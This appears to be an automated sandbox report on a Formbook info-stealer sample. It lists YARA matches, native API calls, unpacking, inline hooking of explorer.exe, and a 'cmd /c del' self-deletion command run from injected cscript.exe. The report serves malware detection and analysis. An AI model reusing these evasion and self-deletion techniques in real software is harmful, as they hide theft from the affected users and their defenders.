            Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: z7d1ehQQQW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_00867C030_2_00867C03
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_0086502D0_2_0086502D
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_02A8C1240_2_02A8C124
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_02A8E5620_2_02A8E562
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_02A8E5700_2_02A8E570
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_008688310_2_00868831
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_004010305_2_00401030
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041E9935_2_0041E993
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00402D8A5_2_00402D8A
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00402D905_2_00402D90
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00409E305_2_00409E30
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041DFD05_2_0041DFD0
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00402FB05_2_00402FB0
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00E9502D5_2_00E9502D
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00E97C035_2_00E97C03
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00E988315_2_00E98831
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CB0909_2_048CB090
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048C841F9_2_048C841F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_049710029_2_04971002
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048CD5E09_2_048CD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048BF9009_2_048BF900
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048B0D209_2_048B0D20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D41209_2_048D4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_04981D559_2_04981D55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048D6E309_2_048D6E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048EEBB09_2_048EEBB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 048BB150 appears 32 times
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419D50 NtCreateFile,5_2_00419D50
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419E00 NtReadFile,5_2_00419E00
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419E80 NtClose,5_2_00419E80
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419F30 NtAllocateVirtualMemory,5_2_00419F30
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419D4A NtCreateFile,5_2_00419D4A
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419E7C NtClose,5_2_00419E7C
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419F2A NtAllocateVirtualMemory,5_2_00419F2A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9840 NtDelayExecution,LdrInitializeThunk,9_2_048F9840
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9860 NtQuerySystemInformation,LdrInitializeThunk,9_2_048F9860
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F99A0 NtCreateSection,LdrInitializeThunk,9_2_048F99A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F95D0 NtClose,LdrInitializeThunk,9_2_048F95D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_048F9910
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9540 NtReadFile,LdrInitializeThunk,9_2_048F9540
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F96D0 NtCreateKey,LdrInitializeThunk,9_2_048F96D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F96E0 NtFreeVirtualMemory,LdrInitializeThunk,9_2_048F96E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9A50 NtCreateFile,LdrInitializeThunk,9_2_048F9A50
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9650 NtQueryValueKey,LdrInitializeThunk,9_2_048F9650
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9660 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_048F9660
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9780 NtMapViewOfSection,LdrInitializeThunk,9_2_048F9780
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9FE0 NtCreateMutant,LdrInitializeThunk,9_2_048F9FE0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9710 NtQueryInformationToken,LdrInitializeThunk,9_2_048F9710
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F98A0 NtWriteVirtualMemory,9_2_048F98A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F98F0 NtReadVirtualMemory,9_2_048F98F0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9820 NtEnumerateKey,9_2_048F9820
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048FB040 NtSuspendThread,9_2_048FB040
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F99D0 NtCreateProcessEx,9_2_048F99D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F95F0 NtQueryInformationFile,9_2_048F95F0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9520 NtWaitForSingleObject,9_2_048F9520
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048FAD30 NtSetContextThread,9_2_048FAD30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9950 NtQueueApcThread,9_2_048F9950
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9560 NtWriteFile,9_2_048F9560
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9A80 NtOpenDirectoryObject,9_2_048F9A80
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9A00 NtProtectVirtualMemory,9_2_048F9A00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9A10 NtQuerySection,9_2_048F9A10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9610 NtEnumerateValueKey,9_2_048F9610
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9A20 NtResumeThread,9_2_048F9A20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9670 NtQueryInformationProcess,9_2_048F9670
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F97A0 NtUnmapViewOfSection,9_2_048F97A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048FA3B0 NtGetContextThread,9_2_048FA3B0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9B00 NtSetValueKey,9_2_048F9B00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048FA710 NtOpenProcessToken,9_2_048FA710
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9730 NtQueryVirtualMemory,9_2_048F9730
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9760 NtOpenProcess,9_2_048F9760
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048F9770 NtSetInformationFile,9_2_048F9770
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_048FA770 NtOpenThread,9_2_048FA770
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D69E80 NtClose,9_2_02D69E80
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D69E00 NtReadFile,9_2_02D69E00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D69F30 NtAllocateVirtualMemory,9_2_02D69F30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D69D50 NtCreateFile,9_2_02D69D50
            Source: z7d1ehQQQW.exe, 00000000.00000002.681699947.0000000007280000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000000.00000002.674788458.000000000090A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFileBasedResourceGrovel.exe6 vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameColladaLoader.dll4 vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000005.00000002.735136542.0000000000F3A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFileBasedResourceGrovel.exe6 vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exeBinary or memory string: OriginalFilenameFileBasedResourceGrovel.exe6 vs z7d1ehQQQW.exe
            Source: z7d1ehQQQW.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: z7d1ehQQQW.exeVirustotal: Detection: 24%
            Source: z7d1ehQQQW.exeReversingLabs: Detection: 13%
            Source: z7d1ehQQQW.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\z7d1ehQQQW.exe 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess created: C:\Users\user\Desktop\z7d1ehQQQW.exe C:\Users\user\Desktop\z7d1ehQQQW.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess created: C:\Users\user\Desktop\z7d1ehQQQW.exe C:\Users\user\Desktop\z7d1ehQQQW.exeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'Jump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z7d1ehQQQW.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@3/2
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: z7d1ehQQQW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: z7d1ehQQQW.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp, cscript.exe, 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: z7d1ehQQQW.exe, 00000005.00000002.736099358.00000000019AF000.00000040.00000001.sdmp, cscript.exe
            Source: Binary string: cscript.pdb source: z7d1ehQQQW.exe, 00000005.00000002.736665067.0000000003520000.00000040.00020000.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: z7d1ehQQQW.exe, CalendarId/MainForm.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 0_2_00867C03 push es; ret 0_2_00867F96
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_004178AB pushfd ; ret 5_2_004178AC
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0040E27F push edx; iretd 5_2_0040E280
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00409BD5 push esp; iretd 5_2_00409BDC
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_004175F8 push edx; iretd 5_2_00417628
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00419DA2 pushad ; retf 5_2_00419DAB
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041660F push edx; iretd 5_2_00416610
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041CEF2 push eax; ret 5_2_0041CEF8
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041CEFB push eax; ret 5_2_0041CF62
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041CEA5 push eax; ret 5_2_0041CEF8
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_0041CF5C push eax; ret 5_2_0041CF62
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeCode function: 5_2_00E97C03 push es; ret 5_2_00E97F96
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_0490D0D1 push ecx; ret 9_2_0490D0E4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D5E27F push edx; iretd 9_2_02D5E280
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D59BD5 push esp; iretd 9_2_02D59BDC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 9_2_02D678AB pushfd ; ret 9_2_02D678AC
            Source: initial sampleStatic PE information: section name: .text entropy: 7.61448564553

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xEF
            Self deletion via cmd deleteShow sources
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del 'C:\Users\user\Desktop\z7d1ehQQQW.exe'Jump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
